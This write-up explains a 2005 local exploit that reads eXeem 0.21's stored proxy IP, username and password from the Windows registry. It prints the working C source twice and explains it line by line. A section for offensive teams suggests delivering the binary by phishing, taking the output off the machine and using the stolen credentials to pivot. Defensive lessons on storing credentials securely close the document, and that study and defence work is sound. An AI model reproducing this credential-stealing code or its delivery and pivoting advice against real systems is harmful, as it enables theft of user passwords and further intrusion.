eXeem 0.21 Local Password Disclosure Explained

What this paper is

This paper is an exploit proof-of-concept (PoC) for a vulnerability in eXeem version 0.21. The vulnerability allows a local user to read the proxy server IP address, username, and password that are stored by the eXeem application. The exploit is a simple C program that directly queries the Windows Registry to retrieve this sensitive information.

Simple technical breakdown

The eXeem application, when configured to use a proxy server, stores its proxy settings (IP, username, and password) in the Windows Registry. This exploit works by:

1. Accessing the Registry: It opens a specific key in the Windows Registry where eXeem stores its configuration.
2. Querying Values: It then reads the values associated with "proxy_ip", "proxy_username", and "proxy_password" from that registry key.
3. Displaying Information: Finally, it prints the retrieved proxy details to the console.

The vulnerability lies in the fact that these settings are stored in a readable format, and any local user with sufficient privileges to run the exploit program can access them.

Complete code and payload walkthrough

The provided code is a C program designed to be compiled and run on a Windows system.

/*****************************************************************

eXeem v0.21 Local Exploit by Kozan

Application: eXeem v0.21
Vendor: www.exeem.com
Vulnerable Description: eXeem v0.21 discloses passwords
for proxy settings to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com

*****************************************************************/

#include <stdio.h>
#include <windows.h>

#define BUFSIZE 100
HKEY hKey;
char proxy_ip[BUFSIZE],
        proxy_username[BUFSIZE],
        proxy_password[BUFSIZE];

DWORD dwBufLen=BUFSIZE;
LONG lRet;

int main()
{

       if(RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Exeem",
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey) == ERROR_SUCCESS)
   {

               lRet = RegQueryValueEx( hKey, "proxy_ip", NULL, NULL,
                                                      (LPBYTE) proxy_ip, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("An error occured!\n");
                                return 0;
                       }

               lRet = RegQueryValueEx( hKey, "proxy_username", NULL, NULL,
                                                      (LPBYTE) proxy_username, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("An error occured!\n");
                                return 0;
                       }

               lRet = RegQueryValueEx( hKey, "proxy_password", NULL, NULL,
                                                      (LPBYTE) proxy_password, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("An error occured!\n");
                                return 0;
                       }

               RegCloseKey(hKey);

               printf("eXeem v0.21 Local Exploit by Kozan\n");
               printf("Credits to ATmaCA\n");
               printf("www.netmagister.com  -  www.spyinstructors.com \n\n");
               printf("Proxy IP           : %s\n",proxy_ip);
               printf("Proxy Username     : %s\n",proxy_username);
               printf("Proxy Password     : %s\n",proxy_password);

   }
       else
       {
       printf("eXeem v0.21 is not installed on your pc!\n");
   }

       return 0;
}

// milw0rm.com [2005-02-22]

Code Fragment/Block -> Practical Purpose

• #include <stdio.h>: Includes standard input/output functions for printing to the console.
• #include <windows.h>: Includes Windows API functions, essential for interacting with the operating system, especially the Registry.
• #define BUFSIZE 100: Defines a constant BUFSIZE for buffer sizes, set to 100 bytes. This is used for storing the registry values.
• HKEY hKey;: Declares a variable hKey of type HKEY. This is a handle to a registry key.
• char proxy_ip[BUFSIZE], proxy_username[BUFSIZE], proxy_password[BUFSIZE];: Declares character arrays (buffers) to store the retrieved proxy IP, username, and password. Each is sized according to BUFSIZE.
• DWORD dwBufLen=BUFSIZE;: Declares a DWORD (double word, typically 32-bit unsigned integer) variable dwBufLen and initializes it with BUFSIZE. This variable will be used to specify the size of the buffer for registry queries and will be updated by the API call to reflect the actual size of the data read.
• LONG lRet;: Declares a LONG variable lRet to store the return status of Windows API functions, particularly registry operations. ERROR_SUCCESS is a common return value for success.
• int main(): The main function where program execution begins.
• if(RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Exeem", 0, KEY_QUERY_VALUE, &hKey) == ERROR_SUCCESS):
  • Purpose: Attempts to open a specific registry key.
  • HKEY_CURRENT_USER: Specifies that the key is located under the current user's profile.
  • "Software\\Exeem": The path to the registry key where eXeem is expected to store its settings.
  • 0: Reserved, must be zero.
  • KEY_QUERY_VALUE: A flag indicating that we only need to query (read) values from this key.
  • &hKey: A pointer to the HKEY variable where the handle to the opened key will be stored if successful.
  • == ERROR_SUCCESS: Checks if the RegOpenKeyEx function returned successfully. If not, the else block is executed.
• lRet = RegQueryValueEx( hKey, "proxy_ip", NULL, NULL, (LPBYTE) proxy_ip, &dwBufLen);:
  • Purpose: Queries a specific value from the opened registry key.
  • hKey: The handle to the registry key obtained from RegOpenKeyEx.
  • "proxy_ip": The name of the registry value to query.
  • NULL, NULL: Reserved parameters, typically unused for this type of query.
  • (LPBYTE) proxy_ip: A pointer to the buffer where the value's data will be stored. LPBYTE is a pointer to a byte.
  • &dwBufLen: A pointer to the DWORD variable that initially holds the buffer size and will be updated with the actual size of the data read.
• if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ):
  • Purpose: Error checking after querying a registry value.
  • lRet != ERROR_SUCCESS: Checks if the RegQueryValueEx call failed.
  • dwBufLen > BUFSIZE: Checks if the retrieved data was larger than the allocated buffer, indicating a potential overflow or incomplete read.
  • If either condition is true, an error message is printed, the registry key is closed, and the program exits.
• The subsequent RegQueryValueEx calls for "proxy_username" and "proxy_password" follow the same pattern as "proxy_ip", querying and checking for errors.
• RegCloseKey(hKey);:
  • Purpose: Closes the registry key handle, releasing system resources. This is crucial for good programming practice.
• printf(...): A series of printf statements to display the exploit banner and the retrieved proxy information to the console.
• else { printf("eXeem v0.21 is not installed on your pc!\n"); }: This block is executed if RegOpenKeyEx failed, meaning the Software\\Exeem registry key was not found, implying eXeem is likely not installed or not configured.
• return 0;: Indicates successful program termination.

Payload/Shellcode Segment Explanation:

There is no shellcode or complex payload in this exploit. The "payload" is simply the output of the program itself: the displayed proxy credentials. The exploit's action is entirely within the C code's interaction with the Windows API.

Practical details for offensive operations teams

• Required Access Level: Local user access. The exploit needs to be executed on the target machine by a user who can run executables. No administrative privileges are required to read registry keys under HKEY_CURRENT_USER.
• Lab Preconditions:
  • A Windows machine with eXeem v0.21 installed and configured with proxy settings.
  • The eXeem application must have written its proxy configuration to the HKEY_CURRENT_USER\Software\Exeem registry key.
  • A C compiler (e.g., MinGW, Visual Studio) to compile the .c file into an executable.
• Tooling Assumptions:
  • Standard Windows command-line environment.
  • A C compiler.
  • The compiled .exe file.
• Execution Pitfalls:
  • eXeem Not Installed/Configured: The primary failure point is if eXeem v0.21 is not installed or if proxy settings were never configured and saved to the registry. The exploit will report "eXeem v0.21 is not installed on your pc!".
  • Registry Key Modified/Moved: If the vendor changed the registry path in later versions or if the key was manually altered, the exploit would fail.
  • Buffer Overflow (Unlikely Here): While BUFSIZE is defined, the RegQueryValueEx function checks dwBufLen against the provided buffer size. If the actual registry value is larger than BUFSIZE, the exploit will report an error and exit, preventing a buffer overflow in this specific code. However, if the error check was absent or flawed, a large value could cause a crash.
  • Permissions Issues (Rare for HKCU): While HKEY_CURRENT_USER is generally accessible by the user, extremely restrictive policies could theoretically prevent even reading these keys, though this is highly uncommon for standard user accounts.
• Tradecraft Considerations:
  • Stealth: Executing a simple .exe file is generally low-fidelity. The telemetry would be the process execution itself. If the .exe is dropped to disk, file system logging might detect it.
  • Payload Delivery: The compiled executable can be delivered via various means (e.g., phishing email attachment, social engineering, dropped by another exploit).
  • Information Gathering: This exploit is purely for information gathering. The output needs to be exfiltrated.
  • Post-Exploitation: The retrieved proxy credentials could be used to pivot, access internal networks, or impersonate the user if the proxy is used for authentication to other services.

Where this was used and when

• Context: This exploit targets the eXeem application, a file-sharing or remote access tool. The vulnerability was discovered and published in early 2005.
• Usage: It would have been used by individuals or teams looking to gain unauthorized access to proxy credentials stored by eXeem users. This could be for personal gain, espionage, or as a step in a larger attack chain. The "local" nature means it requires initial access to the target machine.

Defensive lessons for modern teams

• Secure Credential Storage: Applications should never store sensitive credentials (like passwords) in plain text in the registry or configuration files. Modern applications use secure storage mechanisms, encryption, or rely on OS-provided credential managers.
• Principle of Least Privilege: Even for HKEY_CURRENT_USER, applications should only be granted the minimum necessary permissions. While this exploit leverages existing read permissions, it highlights how even seemingly benign data can be sensitive.
• Registry Monitoring: Monitoring for unexpected registry key creations or modifications, especially under Software keys, can be an indicator of compromise or the installation of potentially vulnerable software.
• Software Inventory and Patching: Maintaining an accurate inventory of installed software and ensuring it's patched is critical. While eXeem v0.21 is ancient, the principle applies to all software. Vulnerabilities in older, unpatched software remain a significant risk.
• Application Hardening: Developers should implement checks to ensure sensitive data is not easily discoverable. This includes avoiding plain-text storage and considering encryption for any stored secrets.

ASCII visual (if applicable)

This exploit is a direct interaction with the operating system's registry. A visual representation would be a simple flow:

+-----------------+     +---------------------+     +---------------------+
| Attacker's      | --> | Exploit Program     | --> | Windows Registry    |
| Process         |     | (eXeem_exploit.exe) |     | (HKCU\Software\Exeem)|
+-----------------+     +---------------------+     +---------------------+
                                                               |
                                                               v
                                                      +---------------------+
                                                      | Proxy IP, Username, |
                                                      | Password Revealed   |
                                                      +---------------------+

Source references

• Paper URL: https://www.exploit-db.com/papers/834
• Raw Exploit URL: https://www.exploit-db.com/raw/834
• Vendor: www.exeem.com (Note: This website may no longer be active or relevant)
• Author: Kozan
• Publication Date: 2005-02-22

Original Exploit-DB Content (Verbatim)

/*****************************************************************

eXeem v0.21 Local Exploit by Kozan

Application: eXeem v0.21
Vendor: www.exeem.com
Vulnerable Description: eXeem v0.21 discloses passwords
for proxy settings to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com

*****************************************************************/

#include <stdio.h>
#include <windows.h>

#define BUFSIZE 100
HKEY hKey;
char proxy_ip[BUFSIZE],
        proxy_username[BUFSIZE],
        proxy_password[BUFSIZE];

DWORD dwBufLen=BUFSIZE;
LONG lRet;

int main()
{

       if(RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Exeem",
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey) == ERROR_SUCCESS)
   {

               lRet = RegQueryValueEx( hKey, "proxy_ip", NULL, NULL,
                                                      (LPBYTE) proxy_ip, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("An error occured!\n");
                                return 0;
                       }

               lRet = RegQueryValueEx( hKey, "proxy_username", NULL, NULL,
                                                      (LPBYTE) proxy_username, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("An error occured!\n");
                                return 0;
                       }

               lRet = RegQueryValueEx( hKey, "proxy_password", NULL, NULL,
                                                      (LPBYTE) proxy_password, &dwBufLen);

                       if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                RegCloseKey(hKey);
                                printf("An error occured!\n");
                                return 0;
                       }

               RegCloseKey(hKey);

               printf("eXeem v0.21 Local Exploit by Kozan\n");
               printf("Credits to ATmaCA\n");
               printf("www.netmagister.com  -  www.spyinstructors.com \n\n");
               printf("Proxy IP           : %s\n",proxy_ip);
               printf("Proxy Username     : %s\n",proxy_username);
               printf("Proxy Password     : %s\n",proxy_password);

   }
       else
       {
       printf("eXeem v0.21 is not installed on your pc!\n");
   }

       return 0;
}

// milw0rm.com [2005-02-22]